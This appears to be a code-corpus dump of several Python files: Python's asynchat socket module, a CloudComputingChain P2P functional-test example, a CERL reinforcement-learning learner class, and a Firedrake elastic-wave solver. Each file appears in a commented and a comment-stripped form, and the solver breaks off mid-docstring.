self.terminator # grab some more data from the socket, # throw it to the collector method, # check for the terminator, # if found, transition to the next state. def handle_read(self): try: data = self.recv(self.ac_in_buffer_size) except BlockingIOError: return except OSError as why: self.handle_error() return if isinstance(data, str) and self.use_encoding: data = bytes(str, self.encoding) self.ac_in_buffer = self.ac_in_buffer + data # Continue to search for self.terminator in self.ac_in_buffer, # while calling self.collect_incoming_data. The while loop # is necessary because we might read several data+terminator # combos with a single recv(4096). while self.ac_in_buffer: lb = len(self.ac_in_buffer) terminator = self.get_terminator() if not terminator: # no terminator, collect it all self.collect_incoming_data(self.ac_in_buffer) self.ac_in_buffer = b'' elif isinstance(terminator, int): # numeric terminator n = terminator if lb < n: self.collect_incoming_data(self.ac_in_buffer) self.ac_in_buffer = b'' self.terminator = self.terminator - lb else: self.collect_incoming_data(self.ac_in_buffer[:n]) self.ac_in_buffer = self.ac_in_buffer[n:] self.terminator = 0 self.found_terminator() else: # 3 cases: # 1) end of buffer matches terminator exactly: # collect data, transition # 2) end of buffer matches some prefix: # collect data to the prefix # 3) end of buffer does not match any prefix: # collect data terminator_len = len(terminator) index = self.ac_in_buffer.find(terminator) if index != -1: # we found the terminator if index > 0: # don't bother reporting the empty string # (source of subtle bugs) self.collect_incoming_data(self.ac_in_buffer[:index]) self.ac_in_buffer = self.ac_in_buffer[index+terminator_len:] # This does the Right Thing if the terminator # is changed here. self.found_terminator() else: # check for a prefix of the terminator index = find_prefix_at_end(self.ac_in_buffer, terminator) if index: if index != lb: # we found a prefix, collect up to the prefix self.collect_incoming_data(self.ac_in_buffer[:-index]) self.ac_in_buffer = self.ac_in_buffer[-index:] break else: # no prefix, collect it all self.collect_incoming_data(self.ac_in_buffer) self.ac_in_buffer = b'' def handle_write(self): self.initiate_send() def handle_close(self): self.close() def push(self, data): if not isinstance(data, (bytes, bytearray, memoryview)): raise TypeError('data argument must be byte-ish (%r)', type(data)) sabs = self.ac_out_buffer_size if len(data) > sabs: for i in range(0, len(data), sabs): self.producer_fifo.append(data[i:i+sabs]) else: self.producer_fifo.append(data) self.initiate_send() def push_with_producer(self, producer): self.producer_fifo.append(producer) self.initiate_send() def readable(self): "predicate for inclusion in the readable for select()" # cannot use the old predicate, it violates the claim of the # set_terminator method. # return (len(self.ac_in_buffer) <= self.ac_in_buffer_size) return 1 def writable(self): "predicate for inclusion in the writable for select()" return self.producer_fifo or (not self.connected) def close_when_done(self): "automatically close this channel once the outgoing queue is empty" self.producer_fifo.append(None) def initiate_send(self): while self.producer_fifo and self.connected: first = self.producer_fifo[0] # handle empty string/buffer or None entry if not first: del self.producer_fifo[0] if first is None: self.handle_close() return # handle classic producer behavior obs = self.ac_out_buffer_size try: data = first[:obs] except TypeError: data = first.more() if data: self.producer_fifo.appendleft(data) else: del self.producer_fifo[0] continue if isinstance(data, str) and self.use_encoding: data = bytes(data, self.encoding) # send the data try: num_sent = self.send(data) except OSError: self.handle_error() return if num_sent: if num_sent < len(data) or obs < len(first): self.producer_fifo[0] = first[num_sent:] else: del self.producer_fifo[0] # we tried to send some actual data return def discard_buffers(self): # Emergencies only! self.ac_in_buffer = b'' del self.incoming[:] self.producer_fifo.clear() class simple_producer: def __init__(self, data, buffer_size=512): self.data = data self.buffer_size = buffer_size def more(self): if len(self.data) > self.buffer_size: result = self.data[:self.buffer_size] self.data = self.data[self.buffer_size:] return result else: result = self.data self.data = b'' return result class fifo: def __init__(self, list=None): import warnings warnings.warn('fifo class will be removed in Python 3.6', DeprecationWarning, stacklevel=2) if not list: self.list = deque() else: self.list = deque(list) def __len__(self): return len(self.list) def is_empty(self): return not self.list def first(self): return self.list[0] def push(self, data): self.list.append(data) def pop(self): if self.list: return (1, self.list.popleft()) else: return (0, None) # Given 'haystack', see if any prefix of 'needle' is at its end. This # assumes an exact match has already been checked. Return the number of # characters matched. # for example: # f_p_a_e("qwerty\r", "\r\n") => 1 # f_p_a_e("qwertydkjf", "\r\n") => 0 # f_p_a_e("qwerty\r\n", "\r\n") => <undefined> # this could maybe be made faster with a computed regex? # [answer: no; circa Python-2.0, Jan 2001] # new python: 28961/s # old python: 18307/s # re: 12820/s # regex: 14035/s def find_prefix_at_end(haystack, needle): l = len(needle) - 1 while l and not haystack.endswith(needle[:l]): l -= 1 return l
35.522255
82
0.589174
import asyncore from collections import deque class async_chat(asyncore.dispatcher): ac_in_buffer_size = 65536 ac_out_buffer_size = 65536 # sign of an application bug that we don't want to pass silently use_encoding = 0 encoding = 'latin-1' def __init__(self, sock=None, map=None): self.ac_in_buffer = b'' self.incoming = [] self.producer_fifo = deque() asyncore.dispatcher.__init__(self, sock, map) def collect_incoming_data(self, data): raise NotImplementedError("must be implemented in subclass") def _collect_incoming_data(self, data): self.incoming.append(data) def _get_data(self): d = b''.join(self.incoming) del self.incoming[:] return d def found_terminator(self): raise NotImplementedError("must be implemented in subclass") def set_terminator(self, term): if isinstance(term, str) and self.use_encoding: term = bytes(term, self.encoding) elif isinstance(term, int) and term < 0: raise ValueError('the number of received bytes must be positive') self.terminator = term def get_terminator(self): return self.terminator def handle_read(self): try: data = self.recv(self.ac_in_buffer_size) except BlockingIOError: return except OSError as why: self.handle_error() return if isinstance(data, str) and self.use_encoding: data = bytes(str, self.encoding) self.ac_in_buffer = self.ac_in_buffer + data while self.ac_in_buffer: lb = len(self.ac_in_buffer) terminator = self.get_terminator() if not terminator: self.collect_incoming_data(self.ac_in_buffer) self.ac_in_buffer = b'' elif isinstance(terminator, int): n = terminator if lb < n: self.collect_incoming_data(self.ac_in_buffer) self.ac_in_buffer = b'' self.terminator = self.terminator - lb else: self.collect_incoming_data(self.ac_in_buffer[:n]) self.ac_in_buffer = self.ac_in_buffer[n:] self.terminator = 0 self.found_terminator() else: terminator_len = len(terminator) index = self.ac_in_buffer.find(terminator) if index != -1: if index > 0: # (source of subtle bugs) self.collect_incoming_data(self.ac_in_buffer[:index]) self.ac_in_buffer = self.ac_in_buffer[index+terminator_len:] # This does the Right Thing if the terminator # is changed here. self.found_terminator() else: # check for a prefix of the terminator index = find_prefix_at_end(self.ac_in_buffer, terminator) if index: if index != lb: # we found a prefix, collect up to the prefix self.collect_incoming_data(self.ac_in_buffer[:-index]) self.ac_in_buffer = self.ac_in_buffer[-index:] break else: # no prefix, collect it all self.collect_incoming_data(self.ac_in_buffer) self.ac_in_buffer = b'' def handle_write(self): self.initiate_send() def handle_close(self): self.close() def push(self, data): if not isinstance(data, (bytes, bytearray, memoryview)): raise TypeError('data argument must be byte-ish (%r)', type(data)) sabs = self.ac_out_buffer_size if len(data) > sabs: for i in range(0, len(data), sabs): self.producer_fifo.append(data[i:i+sabs]) else: self.producer_fifo.append(data) self.initiate_send() def push_with_producer(self, producer): self.producer_fifo.append(producer) self.initiate_send() def readable(self): # cannot use the old predicate, it violates the claim of the # set_terminator method. # return (len(self.ac_in_buffer) <= self.ac_in_buffer_size) return 1 def writable(self): return self.producer_fifo or (not self.connected) def close_when_done(self): self.producer_fifo.append(None) def initiate_send(self): while self.producer_fifo and self.connected: first = self.producer_fifo[0] # handle empty string/buffer or None entry if not first: del self.producer_fifo[0] if first is None: self.handle_close() return # handle classic producer behavior obs = self.ac_out_buffer_size try: data = first[:obs] except TypeError: data = first.more() if data: self.producer_fifo.appendleft(data) else: del self.producer_fifo[0] continue if isinstance(data, str) and self.use_encoding: data = bytes(data, self.encoding) # send the data try: num_sent = self.send(data) except OSError: self.handle_error() return if num_sent: if num_sent < len(data) or obs < len(first): self.producer_fifo[0] = first[num_sent:] else: del self.producer_fifo[0] # we tried to send some actual data return def discard_buffers(self): # Emergencies only! self.ac_in_buffer = b'' del self.incoming[:] self.producer_fifo.clear() class simple_producer: def __init__(self, data, buffer_size=512): self.data = data self.buffer_size = buffer_size def more(self): if len(self.data) > self.buffer_size: result = self.data[:self.buffer_size] self.data = self.data[self.buffer_size:] return result else: result = self.data self.data = b'' return result class fifo: def __init__(self, list=None): import warnings warnings.warn('fifo class will be removed in Python 3.6', DeprecationWarning, stacklevel=2) if not list: self.list = deque() else: self.list = deque(list) def __len__(self): return len(self.list) def is_empty(self): return not self.list def first(self): return self.list[0] def push(self, data): self.list.append(data) def pop(self): if self.list: return (1, self.list.popleft()) else: return (0, None) # Given 'haystack', see if any prefix of 'needle' is at its end. This # assumes an exact match has already been checked. Return the number of # characters matched. # for example: # f_p_a_e("qwerty\r", "\r\n") => 1 # f_p_a_e("qwertydkjf", "\r\n") => 0 # f_p_a_e("qwerty\r\n", "\r\n") => <undefined> # this could maybe be made faster with a computed regex? # [answer: no; circa Python-2.0, Jan 2001] # new python: 28961/s # old python: 18307/s # re: 12820/s # regex: 14035/s def find_prefix_at_end(haystack, needle): l = len(needle) - 1 while l and not haystack.endswith(needle[:l]): l -= 1 return l
true
true
f728d21e7458186f8eea9ec854144e518d6767f5
9,283
py
Python
test/functional/example_test.py
wolfoxonly/cocn
dc29dc24b79882765ecc09d7ba2241492d999124
[ "MIT" ]
null
null
null
test/functional/example_test.py
wolfoxonly/cocn
dc29dc24b79882765ecc09d7ba2241492d999124
[ "MIT" ]
null
null
null
test/functional/example_test.py
wolfoxonly/cocn
dc29dc24b79882765ecc09d7ba2241492d999124
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2017 The CloudComputingChain Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """An example functional test The module-level docstring should include a high-level description of what the test is doing. It's the first thing people see when they open the file and should give the reader information about *what* the test is testing and *how* it's being tested """ # Imports should be in PEP8 ordering (std library first, then third party # libraries then local imports). from collections import defaultdict # Avoid wildcard * imports if possible from test_framework.blocktools import (create_block, create_coinbase) from test_framework.mininode import ( CInv, P2PInterface, mininode_lock, msg_block, msg_getdata, network_thread_join, network_thread_start, ) from test_framework.test_framework import CloudComputingChainTestFramework from test_framework.util import ( assert_equal, connect_nodes, wait_until, ) # P2PInterface is a class containing callbacks to be executed when a P2P # message is received from the node-under-test. Subclass P2PInterface and # override the on_*() methods if you need custom behaviour. class BaseNode(P2PInterface): def __init__(self): """Initialize the P2PInterface Used to inialize custom properties for the Node that aren't included by default in the base class. Be aware that the P2PInterface base class already stores a counter for each P2P message type and the last received message of each type, which should be sufficient for the needs of most tests. Call super().__init__() first for standard initialization and then initialize custom properties.""" super().__init__() # Stores a dictionary of all blocks received self.block_receive_map = defaultdict(int) def on_block(self, message): """Override the standard on_block callback Store the hash of a received block in the dictionary.""" message.block.calc_sha256() self.block_receive_map[message.block.sha256] += 1 def on_inv(self, message): """Override the standard on_inv callback""" pass def custom_function(): """Do some custom behaviour If this function is more generally useful for other tests, consider moving it to a module in test_framework.""" # self.log.info("running custom_function") # Oops! Can't run self.log outside the CloudComputingChainTestFramework pass class ExampleTest(CloudComputingChainTestFramework): # Each functional test is a subclass of the CloudComputingChainTestFramework class. # Override the set_test_params(), add_options(), setup_chain(), setup_network() # and setup_nodes() methods to customize the test setup as required. def set_test_params(self): """Override test parameters for your individual test. This method must be overridden and num_nodes must be exlicitly set.""" self.setup_clean_chain = True self.num_nodes = 3 # Use self.extra_args to change command-line arguments for the nodes self.extra_args = [[], ["-logips"], []] # self.log.info("I've finished set_test_params") # Oops! Can't run self.log before run_test() # Use add_options() to add specific command-line options for your test. # In practice this is not used very much, since the tests are mostly written # to be run in automated environments without command-line options. # def add_options() # pass # Use setup_chain() to customize the node data directories. In practice # this is not used very much since the default behaviour is almost always # fine # def setup_chain(): # pass def setup_network(self): """Setup the test network topology Often you won't need to override this, since the standard network topology (linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests. If you do override this method, remember to start the nodes, assign them to self.nodes, connect them and then sync.""" self.setup_nodes() # In this test, we're not connecting node2 to node0 or node1. Calls to # sync_all() should not include node2, since we're not expecting it to # sync. connect_nodes(self.nodes[0], 1) self.sync_all([self.nodes[0:1]]) # Use setup_nodes() to customize the node start behaviour (for example if # you don't want to start all nodes at the start of the test). # def setup_nodes(): # pass def custom_method(self): """Do some custom behaviour for this test Define it in a method here because you're going to use it repeatedly. If you think it's useful in general, consider moving it to the base CloudComputingChainTestFramework class so other tests can use it.""" self.log.info("Running custom_method") def run_test(self): """Main test logic""" # Create P2P connections to two of the nodes self.nodes[0].add_p2p_connection(BaseNode()) # Start up network handling in another thread. This needs to be called # after the P2P connections have been created. network_thread_start() # wait_for_verack ensures that the P2P connection is fully up. self.nodes[0].p2p.wait_for_verack() # Generating a block on one of the nodes will get us out of IBD blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)] self.sync_all([self.nodes[0:1]]) # Notice above how we called an RPC by calling a method with the same # name on the node object. Notice also how we used a keyword argument # to specify a named RPC argument. Neither of those are defined on the # node object. Instead there's some __getattr__() magic going on under # the covers to dispatch unrecognised attribute calls to the RPC # interface. # Logs are nice. Do plenty of them. They can be used in place of comments for # breaking the test into sub-sections. self.log.info("Starting test!") self.log.info("Calling a custom function") custom_function() self.log.info("Calling a custom method") self.custom_method() self.log.info("Create some blocks") self.tip = int(self.nodes[0].getbestblockhash(), 16) self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1 height = 1 for i in range(10): # Use the mininode and blocktools functionality to manually build a block # Calling the generate() rpc is easier, but this allows us to exactly # control the blocks and transactions. block = create_block(self.tip, create_coinbase(height), self.block_time) block.solve() block_message = msg_block(block) # Send message is used to send a P2P message to the node over our P2PInterface self.nodes[0].p2p.send_message(block_message) self.tip = block.sha256 blocks.append(self.tip) self.block_time += 1 height += 1 self.log.info("Wait for node1 to reach current tip (height 11) using RPC") self.nodes[1].waitforblockheight(11) self.log.info("Connect node2 and node1") connect_nodes(self.nodes[1], 2) self.log.info("Add P2P connection to node2") # We can't add additional P2P connections once the network thread has started. Disconnect the connection # to node0, wait for the network thread to terminate, then connect to node2. This is specific to # the current implementation of the network thread and may be improved in future. self.nodes[0].disconnect_p2ps() network_thread_join() self.nodes[2].add_p2p_connection(BaseNode()) network_thread_start() self.nodes[2].p2p.wait_for_verack() self.log.info("Wait for node2 reach current tip. Test that it has propagated all the blocks to us") getdata_request = msg_getdata() for block in blocks: getdata_request.inv.append(CInv(2, block)) self.nodes[2].p2p.send_message(getdata_request) # wait_until() will loop until a predicate condition is met. Use it to test properties of the # P2PInterface objects. wait_until(lambda: sorted(blocks) == sorted(list(self.nodes[2].p2p.block_receive_map.keys())), timeout=5, lock=mininode_lock) self.log.info("Check that each block was received only once") # The network thread uses a global lock on data access to the P2PConnection objects when sending and receiving # messages. The test thread should acquire the global lock before accessing any P2PConnection data to avoid locking # and synchronization issues. Note wait_until() acquires this global lock when testing the predicate. with mininode_lock: for block in self.nodes[2].p2p.block_receive_map.values(): assert_equal(block, 1) if __name__ == '__main__': ExampleTest().main()
41.627803
133
0.684692
from collections import defaultdict from test_framework.blocktools import (create_block, create_coinbase) from test_framework.mininode import ( CInv, P2PInterface, mininode_lock, msg_block, msg_getdata, network_thread_join, network_thread_start, ) from test_framework.test_framework import CloudComputingChainTestFramework from test_framework.util import ( assert_equal, connect_nodes, wait_until, ) class BaseNode(P2PInterface): def __init__(self): super().__init__() self.block_receive_map = defaultdict(int) def on_block(self, message): message.block.calc_sha256() self.block_receive_map[message.block.sha256] += 1 def on_inv(self, message): pass def custom_function(): ach functional test is a subclass of the CloudComputingChainTestFramework class. # Override the set_test_params(), add_options(), setup_chain(), setup_network() # and setup_nodes() methods to customize the test setup as required. def set_test_params(self): self.setup_clean_chain = True self.num_nodes = 3 # Use self.extra_args to change command-line arguments for the nodes self.extra_args = [[], ["-logips"], []] # self.log.info("I've finished set_test_params") # Use add_options() to add specific command-line options for your test. # In practice this is not used very much, since the tests are mostly written # to be run in automated environments without command-line options. # def add_options() # pass # Use setup_chain() to customize the node data directories. In practice # this is not used very much since the default behaviour is almost always # fine # def setup_chain(): # pass def setup_network(self): self.setup_nodes() # In this test, we're not connecting node2 to node0 or node1. Calls to # sync. connect_nodes(self.nodes[0], 1) self.sync_all([self.nodes[0:1]]) # Use setup_nodes() to customize the node start behaviour (for example if # you don't want to start all nodes at the start of the test). def custom_method(self): self.log.info("Running custom_method") def run_test(self): self.nodes[0].add_p2p_connection(BaseNode()) network_thread_start() self.nodes[0].p2p.wait_for_verack() blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)] self.sync_all([self.nodes[0:1]]) # the covers to dispatch unrecognised attribute calls to the RPC # interface. # Logs are nice. Do plenty of them. They can be used in place of comments for # breaking the test into sub-sections. self.log.info("Starting test!") self.log.info("Calling a custom function") custom_function() self.log.info("Calling a custom method") self.custom_method() self.log.info("Create some blocks") self.tip = int(self.nodes[0].getbestblockhash(), 16) self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1 height = 1 for i in range(10): # Use the mininode and blocktools functionality to manually build a block # Calling the generate() rpc is easier, but this allows us to exactly # control the blocks and transactions. block = create_block(self.tip, create_coinbase(height), self.block_time) block.solve() block_message = msg_block(block) # Send message is used to send a P2P message to the node over our P2PInterface self.nodes[0].p2p.send_message(block_message) self.tip = block.sha256 blocks.append(self.tip) self.block_time += 1 height += 1 self.log.info("Wait for node1 to reach current tip (height 11) using RPC") self.nodes[1].waitforblockheight(11) self.log.info("Connect node2 and node1") connect_nodes(self.nodes[1], 2) self.log.info("Add P2P connection to node2") # We can't add additional P2P connections once the network thread has started. Disconnect the connection self.nodes[0].disconnect_p2ps() network_thread_join() self.nodes[2].add_p2p_connection(BaseNode()) network_thread_start() self.nodes[2].p2p.wait_for_verack() self.log.info("Wait for node2 reach current tip. Test that it has propagated all the blocks to us") getdata_request = msg_getdata() for block in blocks: getdata_request.inv.append(CInv(2, block)) self.nodes[2].p2p.send_message(getdata_request) wait_until(lambda: sorted(blocks) == sorted(list(self.nodes[2].p2p.block_receive_map.keys())), timeout=5, lock=mininode_lock) self.log.info("Check that each block was received only once") with mininode_lock: for block in self.nodes[2].p2p.block_receive_map.values(): assert_equal(block, 1) if __name__ == '__main__': ExampleTest().main()
true
true
f728d223c4a4e54299bf0b1904134c960004cb1f
2,497
py
Python
core/learner.py
qwfy/cerl
4d120929915ecf5ecf1b0fb07c862e80b5073f45
[ "Apache-2.0" ]
null
null
null
core/learner.py
qwfy/cerl
4d120929915ecf5ecf1b0fb07c862e80b5073f45
[ "Apache-2.0" ]
null
null
null
core/learner.py
qwfy/cerl
4d120929915ecf5ecf1b0fb07c862e80b5073f45
[ "Apache-2.0" ]
null
null
null
# ****************************************************************************** # Copyright 2019 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ****************************************************************************** from core.off_policy_algo import Off_Policy_Algo class Learner: """Learner object encapsulating a local learner Parameters: algo_name (str): Algorithm Identifier state_dim (int): State size action_dim (int): Action size actor_lr (float): Actor learning rate critic_lr (float): Critic learning rate gamma (float): DIscount rate tau (float): Target network sync generate init_w (bool): Use kaimling normal to initialize? **td3args (**kwargs): arguments for TD3 algo """ def __init__(self, wwid, algo_name, state_dim, action_dim, actor_lr, critic_lr, gamma, tau, init_w=True, **td3args): self.td3args = td3args; self.id = id self.algo = Off_Policy_Algo(wwid, algo_name, state_dim, action_dim, actor_lr, critic_lr, gamma, tau, init_w) # LEARNER STATISTICS self.fitnesses = [] self.ep_lens = [] self.value = None self.visit_count = 0 def update_parameters(self, replay_buffer, buffer_gpu, batch_size, iterations): for _ in range(iterations): s, ns, a, r, done = replay_buffer.sample(batch_size) if not buffer_gpu: s = s.cuda(); ns = ns.cuda(); a = a.cuda(); r = r.cuda(); done = done.cuda() self.algo.update_parameters(s, ns, a, r, done, 1, **self.td3args) def update_stats(self, fitness, ep_len, gamma=0.2): self.visit_count += 1 self.fitnesses.append(fitness) self.ep_lens.append(ep_len) if self.value == None: self.value = fitness else: self.value = gamma * fitness + (1 - gamma) * self.value
36.720588
120
0.594313
from core.off_policy_algo import Off_Policy_Algo class Learner: def __init__(self, wwid, algo_name, state_dim, action_dim, actor_lr, critic_lr, gamma, tau, init_w=True, **td3args): self.td3args = td3args; self.id = id self.algo = Off_Policy_Algo(wwid, algo_name, state_dim, action_dim, actor_lr, critic_lr, gamma, tau, init_w) self.fitnesses = [] self.ep_lens = [] self.value = None self.visit_count = 0 def update_parameters(self, replay_buffer, buffer_gpu, batch_size, iterations): for _ in range(iterations): s, ns, a, r, done = replay_buffer.sample(batch_size) if not buffer_gpu: s = s.cuda(); ns = ns.cuda(); a = a.cuda(); r = r.cuda(); done = done.cuda() self.algo.update_parameters(s, ns, a, r, done, 1, **self.td3args) def update_stats(self, fitness, ep_len, gamma=0.2): self.visit_count += 1 self.fitnesses.append(fitness) self.ep_lens.append(ep_len) if self.value == None: self.value = fitness else: self.value = gamma * fitness + (1 - gamma) * self.value
true
true
f728d22c5e806d12c24f9ac4884010f227897260
27,787
py
Python
tests/tiling/explosive_source.py
opesci/seigen
7d12eab05ed5a857601babe2933aa804c853de66
[ "MIT" ]
12
2017-08-05T00:01:33.000Z
2019-06-12T13:18:29.000Z
tests/tiling/explosive_source.py
opesci/seigen
7d12eab05ed5a857601babe2933aa804c853de66
[ "MIT" ]
8
2017-08-03T19:49:54.000Z
2018-07-30T18:45:28.000Z
tests/tiling/explosive_source.py
opesci/seigen
7d12eab05ed5a857601babe2933aa804c853de66
[ "MIT" ]
4
2017-08-04T10:15:10.000Z
2018-08-03T05:41:18.000Z
""" This is an explicit DG method: we invert the mass matrix and perform a matrix-vector multiplication to get the solution in a time step """ from math import * import mpi4py import numpy as np from time import time import sys import os import cProfile from firedrake import * from firedrake.petsc import PETSc from pyop2.utils import cached_property from pyop2.profiling import timed_region from pyop2.base import _trace, Dat, DataSet from pyop2.fusion.interface import loop_chain from pyop2.logger import info, set_log_level, INFO import coffee.base as ast from utils import parser, output_time, calculate_sdepth, FusionSchemes class ElasticLF4(object): r"""An elastic wave equation solver, using the finite element method for spatial discretisation, and a fourth-order leap-frog time-stepping scheme.""" loop_chain_length = 28 num_solves = 8 def __init__(self, mesh, family, degree, dimension, output=1, params=None): r""" Initialise a new elastic wave simulation. :param mesh: The underlying computational mesh of vertices and edges. :param str family: Specify whether CG or DG should be used. :param int degree: Use polynomial basis functions of this degree. :param int dimension: The spatial dimension of the problem (1, 2 or 3). :param int output: period, in timesteps, to write solution fields to a file. :param dict params: simulation and optimisation parameters :returns: None """ self.degree = degree self.mesh = mesh self.dimension = dimension self.output = output self.tofile = params['tofile'] self.S = TensorFunctionSpace(mesh, family, degree, name='S') self.U = VectorFunctionSpace(mesh, family, degree, name='U') # Assumes that the S and U function spaces are the same. self.S_tot_dofs = op2.MPI.COMM_WORLD.allreduce(self.S.dof_count, op=mpi4py.MPI.SUM) self.U_tot_dofs = op2.MPI.COMM_WORLD.allreduce(self.U.dof_count, op=mpi4py.MPI.SUM) info("Number of degrees of freedom (Velocity): %d" % self.U_tot_dofs) info("Number of degrees of freedom (Stress): %d" % self.S_tot_dofs) self.s = TrialFunction(self.S) self.v = TestFunction(self.S) self.u = TrialFunction(self.U) self.w = TestFunction(self.U) self.s0 = Function(self.S, name="StressOld") self.sh1 = Function(self.S, name="StressHalf1") self.stemp = Function(self.S, name="StressTemp") self.sh2 = Function(self.S, name="StressHalf2") self.s1 = Function(self.S, name="StressNew") self.u0 = Function(self.U, name="VelocityOld") self.uh1 = Function(self.U, name="VelocityHalf1") self.utemp = Function(self.U, name="VelocityTemp") self.uh2 = Function(self.U, name="VelocityHalf2") self.u1 = Function(self.U, name="VelocityNew") self.absorption_function = None self.source_function = None self.source_expression = None self._dt = None self._density = None self._mu = None self._l = None self.n = FacetNormal(self.mesh) self.I = Identity(self.dimension) # Tiling options self.tiling_size = params['tile_size'] self.tiling_uf = params['num_unroll'] self.tiling_mode = params['mode'] self.tiling_halo = params['extra_halo'] self.tiling_explicit = params['explicit_mode'] self.tiling_explicit_id = params['explicit_mode_id'] self.tiling_log = params['log'] self.tiling_sdepth = params['s_depth'] self.tiling_part = params['partitioning'] self.tiling_coloring = params['coloring'] self.tiling_glb_maps = params['use_glb_maps'] self.tiling_prefetch = params['use_prefetch'] # Mat-vec AST cache self.asts = {} if self.tofile: # File output streams platform = os.environ.get('NODENAME', 'unknown') tmpdir = os.environ['TMPDIR'] base = os.path.join(tmpdir, 'output', platform, 'p%d' % self.degree, 'uf%d' % self.tiling_uf) if op2.MPI.COMM_WORLD.rank == 0: if not os.path.exists(base): os.makedirs(base) sub_dirs = [d for d in os.listdir(base) if os.path.isdir(os.path.join(base, d))] sub_dir = "%d_em%d_part%s_tile%s" % (len(sub_dirs), self.tiling_explicit_id, self.tiling_size if self.tiling_uf else 0, self.tiling_part if self.tiling_uf else 'None') base = os.path.join(base, sub_dir) os.makedirs(base) op2.MPI.COMM_WORLD.barrier() base = op2.MPI.COMM_WORLD.bcast(base, root=0) self.u_stream = File(os.path.join(base, 'velocity.pvd')) self.s_stream = File(os.path.join(base, 'stress.pvd')) @property def absorption(self): r""" The absorption coefficient :math:`\sigma` for the absorption term .. math:: \sigma\mathbf{u} where :math:`\mathbf{u}` is the velocity field. """ return self.absorption_function @absorption.setter def absorption(self, expression): r""" Setter function for the absorption field. :param firedrake.Expression expression: The expression to interpolate onto the absorption field. """ self.absorption_function.interpolate(expression) # Source term @property def source(self): r""" The source term on the RHS of the velocity (or stress) equation. """ return self.source_function @source.setter def source(self, expression): r""" Setter function for the source field. :param firedrake.Expression expression: The expression to interpolate onto the source field. """ self.source_function.interpolate(expression) def assemble_inverse_mass(self): r""" Compute the inverse of the consistent mass matrix for the velocity and stress equations. :returns: None """ # Inverse of the (consistent) mass matrix for the velocity equation. self.inverse_mass_velocity = assemble(inner(self.w, self.u)*dx, inverse=True) self.inverse_mass_velocity.assemble() self.imass_velocity = self.inverse_mass_velocity.M # Inverse of the (consistent) mass matrix for the stress equation. self.inverse_mass_stress = assemble(inner(self.v, self.s)*dx, inverse=True) self.inverse_mass_stress.assemble() self.imass_stress = self.inverse_mass_stress.M def copy_massmatrix_into_dat(self): # Copy the velocity mass matrix into a Dat vmat = self.imass_velocity.handle dofs_per_entity = self.U.fiat_element.entity_dofs() dofs_per_entity = sum(self.mesh.make_dofs_per_plex_entity(dofs_per_entity)) arity = dofs_per_entity*self.U.topological.dim self.velocity_mass_asdat = Dat(DataSet(self.mesh.cell_set, arity*arity), dtype='double') istart, iend = vmat.getOwnershipRange() idxs = [PETSc.IS().createGeneral(np.arange(i, i+arity, dtype=np.int32), comm=PETSc.COMM_SELF) for i in range(istart, iend, arity)] submats = vmat.getSubMatrices(idxs, idxs) for i, m in enumerate(submats): self.velocity_mass_asdat.data[i] = m[:, :].flatten() info("Computed velocity mass matrix") # Copy the stress mass matrix into a Dat smat = self.imass_stress.handle dofs_per_entity = self.S.fiat_element.entity_dofs() dofs_per_entity = sum(self.mesh.make_dofs_per_plex_entity(dofs_per_entity)) arity = dofs_per_entity*self.S.topological.dim self.stress_mass_asdat = Dat(DataSet(self.mesh.cell_set, arity*arity), dtype='double') istart, iend = smat.getOwnershipRange() idxs = [PETSc.IS().createGeneral(np.arange(i, i+arity, dtype=np.int32), comm=PETSc.COMM_SELF) for i in range(istart, iend, arity)] submats = smat.getSubMatrices(idxs, idxs) for i, m in enumerate(submats): self.stress_mass_asdat.data[i] = m[:, :].flatten() info("Computed stress mass matrix") @property def form_uh1(self): """ UFL for uh1 equation. """ F = inner(self.w, self.u)*dx - self.f(self.w, self.s0, self.u0, self.n, self.absorption) return F @cached_property def rhs_uh1(self): """ RHS for uh1 equation. """ return rhs(self.form_uh1) @property def form_stemp(self): """ UFL for stemp equation. """ F = inner(self.v, self.s)*dx - self.g(self.v, self.uh1, self.I, self.n, self.l, self.mu, self.source) return F @cached_property def rhs_stemp(self): """ RHS for stemp equation. """ return rhs(self.form_stemp) @property def form_uh2(self): """ UFL for uh2 equation. """ F = inner(self.w, self.u)*dx - self.f(self.w, self.stemp, self.u0, self.n, self.absorption) return F @cached_property def rhs_uh2(self): """ RHS for uh2 equation. """ return rhs(self.form_uh2) @property def form_u1(self): """ UFL for u1 equation. """ # Note that we have multiplied through by dt here. F = self.density*inner(self.w, self.u)*dx - self.density*inner(self.w, self.u0)*dx - self.dt*inner(self.w, self.uh1)*dx - ((self.dt**3)/24.0)*inner(self.w, self.uh2)*dx return F @cached_property def rhs_u1(self): """ RHS for u1 equation. """ return rhs(self.form_u1) @property def form_sh1(self): """ UFL for sh1 equation. """ F = inner(self.v, self.s)*dx - self.g(self.v, self.u1, self.I, self.n, self.l, self.mu, self.source) return F @cached_property def rhs_sh1(self): """ RHS for sh1 equation. """ return rhs(self.form_sh1) @property def form_utemp(self): """ UFL for utemp equation. """ F = inner(self.w, self.u)*dx - self.f(self.w, self.sh1, self.u1, self.n, self.absorption) return F @cached_property def rhs_utemp(self): """ RHS for utemp equation. """ return rhs(self.form_utemp) @property def form_sh2(self): """ UFL for sh2 equation. """ F = inner(self.v, self.s)*dx - self.g(self.v, self.utemp, self.I, self.n, self.l, self.mu, self.source) return F @cached_property def rhs_sh2(self): """ RHS for sh2 equation. """ return rhs(self.form_sh2) @property def form_s1(self): """ UFL for s1 equation. """ # Note that we have multiplied through by dt here. F = inner(self.v, self.s)*dx - inner(self.v, self.s0)*dx - self.dt*inner(self.v, self.sh1)*dx - ((self.dt**3)/24.0)*inner(self.v, self.sh2)*dx return F @cached_property def rhs_s1(self): """ RHS for s1 equation. """ return rhs(self.form_s1) def f(self, w, s0, u0, n, absorption=None): """ The RHS of 